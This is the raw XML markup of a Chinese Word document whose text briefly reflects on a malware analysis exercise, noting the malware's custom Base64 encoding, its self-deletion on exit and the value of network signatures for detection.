          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过分析恶意代码构建网络信令的信息源元素，认识到攻击者可能通过追踪特定主机和用户来实现其目的。对于Base64编码的不寻常使用，特别是在填充时替代等号，展示了攻击者的一些技术手段。采用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>自定义的Base64变种进行编码。这表明攻击者在尝试混淆通信内容，但也提醒了防御者在检测时需要考虑不同的编码方案</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>恶意代码在退出时尝试删除自身，表明其可能是一次性组件，用于特</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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定攻击目的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>提示防御者在检测和响应</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>时需要注意这类行为。通过分析恶意代码的特征，可以建立有效的检测规则，帮助防御者及时发现并应对潜在的网络威胁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>特别是在网络特征中，一些静态组件可以作为独立的检测目标。了解恶意代码是如何获取和解析命令的，以及对参数的处理方式，有助于理解攻击者的行为模式，为网络安全工作提供更多洞察力。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0214CC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="870214CC"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="95C2E175"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="95C2E175"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="（%1）"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="4454787E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4454787E"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:nsid w:val="5F07175F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5F07175F"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4">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VmNzU4MmJiMGFiOWZlMWQwNWVhOWRiZTc2ZDdiZGYifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00F51A3F"/>
    <w:rsid w:val="000A38B2"/>
    <w:rsid w:val="00161866"/>
    <w:rsid w:val="002B70E9"/>
    <w:rsid w:val="004F18E2"/>
    <w:rsid w:val="00674F5A"/>
    <w:rsid w:val="007F2672"/>
    <w:rsid w:val="008028FC"/>
    <w:rsid w:val="00A07F76"/>
    <w:rsid w:val="00B556B0"/>
    <w:rsid w:val="00E12748"/>
    <w:rsid w:val="00ED6E0D"/>
    <w:rsid w:val="00F51A3F"/>
    <w:rsid w:val="011530C3"/>
    <w:rsid w:val="01506F0F"/>
    <w:rsid w:val="018E0D25"/>
    <w:rsid w:val="0236335D"/>
    <w:rsid w:val="02925881"/>
    <w:rsid w:val="02FF1990"/>
    <w:rsid w:val="03425562"/>
    <w:rsid w:val="03D57369"/>
    <w:rsid w:val="03E351F2"/>
    <w:rsid w:val="03FA0521"/>
    <w:rsid w:val="04846AEC"/>
    <w:rsid w:val="04A56A81"/>
    <w:rsid w:val="04AD726D"/>
    <w:rsid w:val="057E74DF"/>
    <w:rsid w:val="05B92B63"/>
    <w:rsid w:val="069F318C"/>
    <w:rsid w:val="06C80016"/>
    <w:rsid w:val="07C01BF2"/>
    <w:rsid w:val="08360110"/>
    <w:rsid w:val="087D7F38"/>
    <w:rsid w:val="090F782C"/>
    <w:rsid w:val="09420839"/>
    <w:rsid w:val="09700714"/>
    <w:rsid w:val="09BF1E8A"/>
    <w:rsid w:val="09F6357D"/>
    <w:rsid w:val="0A39491D"/>
    <w:rsid w:val="0A8C7FBE"/>
    <w:rsid w:val="0AFB2E60"/>
    <w:rsid w:val="0AFF1189"/>
    <w:rsid w:val="0B0F11BF"/>
    <w:rsid w:val="0BA565DB"/>
    <w:rsid w:val="0BD91A6D"/>
    <w:rsid w:val="0BE67BA2"/>
    <w:rsid w:val="0C9168E5"/>
    <w:rsid w:val="0D293630"/>
    <w:rsid w:val="0E7E5744"/>
    <w:rsid w:val="0E992EBC"/>
    <w:rsid w:val="0EE21C54"/>
    <w:rsid w:val="0EFC4D43"/>
    <w:rsid w:val="0F0625CE"/>
    <w:rsid w:val="0F072309"/>
    <w:rsid w:val="0F26713F"/>
    <w:rsid w:val="0FA20284"/>
    <w:rsid w:val="0FD07018"/>
    <w:rsid w:val="109F27DD"/>
    <w:rsid w:val="10BA0C2F"/>
    <w:rsid w:val="10C21B83"/>
    <w:rsid w:val="119E4CA7"/>
    <w:rsid w:val="11B2708B"/>
    <w:rsid w:val="12282CC2"/>
    <w:rsid w:val="12611B8F"/>
    <w:rsid w:val="127C4DBC"/>
    <w:rsid w:val="134C79C3"/>
    <w:rsid w:val="13E76B92"/>
    <w:rsid w:val="14B040EF"/>
    <w:rsid w:val="159F2CD8"/>
    <w:rsid w:val="168D3A3C"/>
    <w:rsid w:val="16973934"/>
    <w:rsid w:val="17391540"/>
    <w:rsid w:val="176C0D57"/>
    <w:rsid w:val="17DB5EF1"/>
    <w:rsid w:val="17FE5F30"/>
    <w:rsid w:val="18790363"/>
    <w:rsid w:val="18DC7E6B"/>
    <w:rsid w:val="194E79C7"/>
    <w:rsid w:val="1A163004"/>
    <w:rsid w:val="1A240213"/>
    <w:rsid w:val="1A26586E"/>
    <w:rsid w:val="1A323A0D"/>
    <w:rsid w:val="1A8F7B47"/>
    <w:rsid w:val="1AE6196C"/>
    <w:rsid w:val="1B0267A3"/>
    <w:rsid w:val="1B127AB2"/>
    <w:rsid w:val="1B3034D3"/>
    <w:rsid w:val="1B682381"/>
    <w:rsid w:val="1BB20EC9"/>
    <w:rsid w:val="1BD85AD2"/>
    <w:rsid w:val="1C1906DD"/>
    <w:rsid w:val="1CA166C2"/>
    <w:rsid w:val="1D3739B0"/>
    <w:rsid w:val="1D44297A"/>
    <w:rsid w:val="1E7D4396"/>
    <w:rsid w:val="1E895406"/>
    <w:rsid w:val="1F412686"/>
    <w:rsid w:val="1F7317C2"/>
    <w:rsid w:val="20144886"/>
    <w:rsid w:val="20147CC9"/>
    <w:rsid w:val="20AA5C8C"/>
    <w:rsid w:val="20B816B5"/>
    <w:rsid w:val="20C57FB7"/>
    <w:rsid w:val="219A58EA"/>
    <w:rsid w:val="21F127E0"/>
    <w:rsid w:val="224A7467"/>
    <w:rsid w:val="22C37103"/>
    <w:rsid w:val="23113111"/>
    <w:rsid w:val="235356C5"/>
    <w:rsid w:val="23B56EDC"/>
    <w:rsid w:val="247578BD"/>
    <w:rsid w:val="25357778"/>
    <w:rsid w:val="25581569"/>
    <w:rsid w:val="256D662A"/>
    <w:rsid w:val="25A55F80"/>
    <w:rsid w:val="25CA099D"/>
    <w:rsid w:val="268008DA"/>
    <w:rsid w:val="26B64928"/>
    <w:rsid w:val="26E03714"/>
    <w:rsid w:val="276417AC"/>
    <w:rsid w:val="27A36F52"/>
    <w:rsid w:val="27D326E8"/>
    <w:rsid w:val="28FF3B84"/>
    <w:rsid w:val="297339A7"/>
    <w:rsid w:val="298A4EA4"/>
    <w:rsid w:val="299F1664"/>
    <w:rsid w:val="29F119A6"/>
    <w:rsid w:val="2A1F4612"/>
    <w:rsid w:val="2A53244F"/>
    <w:rsid w:val="2A7228D5"/>
    <w:rsid w:val="2AA1705C"/>
    <w:rsid w:val="2AB70C30"/>
    <w:rsid w:val="2AD84B4C"/>
    <w:rsid w:val="2B54472B"/>
    <w:rsid w:val="2BA9559E"/>
    <w:rsid w:val="2CBC4A14"/>
    <w:rsid w:val="2D3E1DC4"/>
    <w:rsid w:val="2D423A01"/>
    <w:rsid w:val="2D6D4E3F"/>
    <w:rsid w:val="2E5F316E"/>
    <w:rsid w:val="2EC1207D"/>
    <w:rsid w:val="2F4D56BE"/>
    <w:rsid w:val="2FCC7E6C"/>
    <w:rsid w:val="30AB5338"/>
    <w:rsid w:val="30D82FEF"/>
    <w:rsid w:val="31315B2B"/>
    <w:rsid w:val="318A2097"/>
    <w:rsid w:val="31B445D4"/>
    <w:rsid w:val="31E247E4"/>
    <w:rsid w:val="320C737C"/>
    <w:rsid w:val="321F662A"/>
    <w:rsid w:val="32201513"/>
    <w:rsid w:val="33260436"/>
    <w:rsid w:val="33446DD8"/>
    <w:rsid w:val="33AB32FB"/>
    <w:rsid w:val="34223754"/>
    <w:rsid w:val="343F10D3"/>
    <w:rsid w:val="34400F70"/>
    <w:rsid w:val="345301D9"/>
    <w:rsid w:val="34684D49"/>
    <w:rsid w:val="35583A19"/>
    <w:rsid w:val="360D5BA8"/>
    <w:rsid w:val="3885411B"/>
    <w:rsid w:val="38A17310"/>
    <w:rsid w:val="39B4544E"/>
    <w:rsid w:val="3AA36A3E"/>
    <w:rsid w:val="3AB9252D"/>
    <w:rsid w:val="3AE23F7F"/>
    <w:rsid w:val="3AE570F3"/>
    <w:rsid w:val="3B172768"/>
    <w:rsid w:val="3B590718"/>
    <w:rsid w:val="3B591E30"/>
    <w:rsid w:val="3BC74A4B"/>
    <w:rsid w:val="3BDF5305"/>
    <w:rsid w:val="3BE0279D"/>
    <w:rsid w:val="3BE64ED1"/>
    <w:rsid w:val="3C892C03"/>
    <w:rsid w:val="3C8B5D33"/>
    <w:rsid w:val="3D1D51DD"/>
    <w:rsid w:val="3E522CF1"/>
    <w:rsid w:val="3EB061FC"/>
    <w:rsid w:val="3EF868E3"/>
    <w:rsid w:val="3F4D0F72"/>
    <w:rsid w:val="3FC56352"/>
    <w:rsid w:val="402E32EA"/>
    <w:rsid w:val="40D0553A"/>
    <w:rsid w:val="40F879F4"/>
    <w:rsid w:val="41642659"/>
    <w:rsid w:val="419B49AF"/>
    <w:rsid w:val="41C001EC"/>
    <w:rsid w:val="41CC4285"/>
    <w:rsid w:val="41CE268F"/>
    <w:rsid w:val="4228052A"/>
    <w:rsid w:val="42472441"/>
    <w:rsid w:val="4278294E"/>
    <w:rsid w:val="42BD0BDC"/>
    <w:rsid w:val="42ED4682"/>
    <w:rsid w:val="43543566"/>
    <w:rsid w:val="43950C0A"/>
    <w:rsid w:val="43AE2D9E"/>
    <w:rsid w:val="43CD21AA"/>
    <w:rsid w:val="443239D6"/>
    <w:rsid w:val="455663D7"/>
    <w:rsid w:val="459A2FF4"/>
    <w:rsid w:val="466924AB"/>
    <w:rsid w:val="466B634C"/>
    <w:rsid w:val="47307948"/>
    <w:rsid w:val="47CC5C9E"/>
    <w:rsid w:val="48304B32"/>
    <w:rsid w:val="483656FA"/>
    <w:rsid w:val="48D35374"/>
    <w:rsid w:val="49A01180"/>
    <w:rsid w:val="49BF201E"/>
    <w:rsid w:val="49C9672E"/>
    <w:rsid w:val="4A01737A"/>
    <w:rsid w:val="4A1C1F96"/>
    <w:rsid w:val="4A912656"/>
    <w:rsid w:val="4AB86841"/>
    <w:rsid w:val="4ABA7A6E"/>
    <w:rsid w:val="4AF3760A"/>
    <w:rsid w:val="4B5E2AF9"/>
    <w:rsid w:val="4B6978CC"/>
    <w:rsid w:val="4C5D11DF"/>
    <w:rsid w:val="4C7E4CB1"/>
    <w:rsid w:val="4D19274C"/>
    <w:rsid w:val="4D4759EB"/>
    <w:rsid w:val="4D562F06"/>
    <w:rsid w:val="4D587BF8"/>
    <w:rsid w:val="4DAE7818"/>
    <w:rsid w:val="4E0A17D6"/>
    <w:rsid w:val="4E3B3D44"/>
    <w:rsid w:val="4EA20CE3"/>
    <w:rsid w:val="4EAA4E4E"/>
    <w:rsid w:val="4EBE6421"/>
    <w:rsid w:val="4F0B46F9"/>
    <w:rsid w:val="4FFB2E4E"/>
    <w:rsid w:val="50394928"/>
    <w:rsid w:val="504B1AAB"/>
    <w:rsid w:val="507461E5"/>
    <w:rsid w:val="50B909AE"/>
    <w:rsid w:val="50D61560"/>
    <w:rsid w:val="51645C00"/>
    <w:rsid w:val="51C27A95"/>
    <w:rsid w:val="51E47B0B"/>
    <w:rsid w:val="52391DA6"/>
    <w:rsid w:val="5266020F"/>
    <w:rsid w:val="526D4CD2"/>
    <w:rsid w:val="53022E14"/>
    <w:rsid w:val="536270DB"/>
    <w:rsid w:val="547A0454"/>
    <w:rsid w:val="54CF07A0"/>
    <w:rsid w:val="54ED13D9"/>
    <w:rsid w:val="55B10E2F"/>
    <w:rsid w:val="55BB665D"/>
    <w:rsid w:val="55CC1183"/>
    <w:rsid w:val="56444B4C"/>
    <w:rsid w:val="56466840"/>
    <w:rsid w:val="564B43CE"/>
    <w:rsid w:val="56921A85"/>
    <w:rsid w:val="56D93B58"/>
    <w:rsid w:val="5721105B"/>
    <w:rsid w:val="57671164"/>
    <w:rsid w:val="58313520"/>
    <w:rsid w:val="58BC0970"/>
    <w:rsid w:val="59215342"/>
    <w:rsid w:val="594B3504"/>
    <w:rsid w:val="59AD1935"/>
    <w:rsid w:val="5A757D8A"/>
    <w:rsid w:val="5B263D4D"/>
    <w:rsid w:val="5B6146B5"/>
    <w:rsid w:val="5B800EBF"/>
    <w:rsid w:val="5C181D1B"/>
    <w:rsid w:val="5C3F5CCB"/>
    <w:rsid w:val="5C825F7D"/>
    <w:rsid w:val="5D116872"/>
    <w:rsid w:val="5D3949FA"/>
    <w:rsid w:val="5D610403"/>
    <w:rsid w:val="5E04785E"/>
    <w:rsid w:val="5EF32BB6"/>
    <w:rsid w:val="605E50CE"/>
    <w:rsid w:val="60734625"/>
    <w:rsid w:val="6077549B"/>
    <w:rsid w:val="60B740B3"/>
    <w:rsid w:val="60F26837"/>
    <w:rsid w:val="61603FDB"/>
    <w:rsid w:val="61A84853"/>
    <w:rsid w:val="61B93186"/>
    <w:rsid w:val="620B4DE2"/>
    <w:rsid w:val="633E255F"/>
    <w:rsid w:val="63C17E4E"/>
    <w:rsid w:val="64145689"/>
    <w:rsid w:val="6490226C"/>
    <w:rsid w:val="64BE0410"/>
    <w:rsid w:val="65955131"/>
    <w:rsid w:val="65F53EAC"/>
    <w:rsid w:val="664D3C1B"/>
    <w:rsid w:val="668F5DE4"/>
    <w:rsid w:val="669E75A1"/>
    <w:rsid w:val="66C5326B"/>
    <w:rsid w:val="67513297"/>
    <w:rsid w:val="679A18F7"/>
    <w:rsid w:val="67DC109F"/>
    <w:rsid w:val="680E1188"/>
    <w:rsid w:val="68355718"/>
    <w:rsid w:val="68776D2D"/>
    <w:rsid w:val="68F14AEB"/>
    <w:rsid w:val="69A00D58"/>
    <w:rsid w:val="69BF33FD"/>
    <w:rsid w:val="69D67D96"/>
    <w:rsid w:val="69F05CE0"/>
    <w:rsid w:val="6A611B11"/>
    <w:rsid w:val="6AA73316"/>
    <w:rsid w:val="6AF00EE6"/>
    <w:rsid w:val="6AFA59F3"/>
    <w:rsid w:val="6B1B7E43"/>
    <w:rsid w:val="6B307049"/>
    <w:rsid w:val="6B527828"/>
    <w:rsid w:val="6B5B41E5"/>
    <w:rsid w:val="6BA25D94"/>
    <w:rsid w:val="6BA35B0F"/>
    <w:rsid w:val="6BC847B1"/>
    <w:rsid w:val="6C42653B"/>
    <w:rsid w:val="6D102818"/>
    <w:rsid w:val="6E4A015A"/>
    <w:rsid w:val="6F3C6506"/>
    <w:rsid w:val="6F524910"/>
    <w:rsid w:val="70393F4B"/>
    <w:rsid w:val="70CF0F02"/>
    <w:rsid w:val="70E63D3E"/>
    <w:rsid w:val="70F06468"/>
    <w:rsid w:val="71321AE6"/>
    <w:rsid w:val="716E19B6"/>
    <w:rsid w:val="71902C0D"/>
    <w:rsid w:val="71C86942"/>
    <w:rsid w:val="728346D7"/>
    <w:rsid w:val="72CE3120"/>
    <w:rsid w:val="72E45112"/>
    <w:rsid w:val="72E47527"/>
    <w:rsid w:val="737A5BB9"/>
    <w:rsid w:val="746C75DF"/>
    <w:rsid w:val="7502333A"/>
    <w:rsid w:val="750D66D2"/>
    <w:rsid w:val="75357D54"/>
    <w:rsid w:val="757363A1"/>
    <w:rsid w:val="76756043"/>
    <w:rsid w:val="76B15B00"/>
    <w:rsid w:val="77167DC1"/>
    <w:rsid w:val="77BB1834"/>
    <w:rsid w:val="784B33CA"/>
    <w:rsid w:val="784F5340"/>
    <w:rsid w:val="78C22792"/>
    <w:rsid w:val="78C32847"/>
    <w:rsid w:val="78D0128B"/>
    <w:rsid w:val="78FF5EC9"/>
    <w:rsid w:val="790243F1"/>
    <w:rsid w:val="795E6047"/>
    <w:rsid w:val="79B8531A"/>
    <w:rsid w:val="79F01948"/>
    <w:rsid w:val="7A2066CD"/>
    <w:rsid w:val="7A866537"/>
    <w:rsid w:val="7B501292"/>
    <w:rsid w:val="7B53100C"/>
    <w:rsid w:val="7B6171A7"/>
    <w:rsid w:val="7BC55562"/>
    <w:rsid w:val="7BD50079"/>
    <w:rsid w:val="7BD647C7"/>
    <w:rsid w:val="7CBF7B20"/>
    <w:rsid w:val="7CDD7B66"/>
    <w:rsid w:val="7CEB7024"/>
    <w:rsid w:val="7D766CDB"/>
    <w:rsid w:val="7E36511A"/>
    <w:rsid w:val="7E97382D"/>
    <w:rsid w:val="7FEA4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tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>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7">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="6"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="8">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="6"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="9">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="6"/>
    <w:link w:val="2"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="10">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17</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>158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sl</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-19T20:39:33Z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8FA30E6C85794D639AD369AE63380425_12</vt:lpwstr>
  </property>
</Properties>
</file>